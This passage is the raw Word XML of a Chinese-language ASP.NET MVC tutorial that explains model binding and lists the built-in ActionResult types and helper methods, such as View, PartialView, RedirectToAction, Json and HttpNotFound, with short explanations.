      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>进行获取；常见的上下文对象包含(Request，HttpContext,RouteData,User,TempData)；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>被传递给动作方法而形成的数据；Controller父类使用了叫“值提供器(Value Provider)”和“模型绑定器(Model Binder)”的MVC框架组件来获取动作方法的参数值，它们会抓取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Request.Forms，Request.QueryString，Request.Files以及RouteData.Values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的数据项。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>明确地调用框架的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>模型绑定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>特性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>产生输出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MVC框架通过使用动作结果把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指明意图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>执行意图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分离开。它有助于实现更简单，更简洁且更一致的代码，这些代码更易于阅读和测试。MVC框架所有的内建动作结果类型都派生于ActionResult。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w: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2"/>
        <w:gridCol w:w="4677"/>
        <w:gridCol w:w="3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jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>辅助器方法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ViewResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>返回指定的或默认的视图模板</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>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PartialViewResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>返回指定的或默认的分部视图模板</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>PartialView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RedirectToRouterResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>重定向到一个动作方法或路由</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>RedirectToAction</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>RedirectToActionPermanent</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>RedirectToRoute</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>RedirectToRoutePermanent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RedirectResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>重定向到指定的URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Redirect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ContentResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>返回文本数据</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>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pPr>
            <w:r>
              <w:t>FilePathResult</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
            </w:pPr>
            <w:r>
              <w:t>FileContentResult</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>FileStreamResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>将二进制数据直接传给浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>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JsonResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>将一个.NET对象序列化为JSON格式</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Json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JavaScriptResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>发送一个由浏览器执行的JavaScript源代码判断</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>JavaScript</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>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HttpUnauthorizedResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>将响应的HTTP状态码设置为401，这回引发当前认证机制要求访问者登陆</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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HttpNotFoundResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>返回一个404错误</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>HttpNotFound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HttpStatusCodeResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>返回一个指定的HTTP状态码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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EmptyResult</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4677" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>什么也不做</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3203" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:rPr>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>详细解释：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>PartialView</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当需要多次使用一个页面的某一部分的时候，可以把它封装成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分部视图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。我们完全可以通过AJAX调用控制器的PartialView方法来返回不同的HTML。只是这样做所需的字节数会比返回一个JSON要多。PartialView和View的区别在于PartialView不能包含母版页。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RedirectToAction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>可以转到指定的控制器中的动作方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，它采用的302重定向。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RedirectToAction(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Index"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Home"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RedirectToRoute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>定义一个路由对象来重定向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，它采用的302重定向。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>RedirectToRoute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
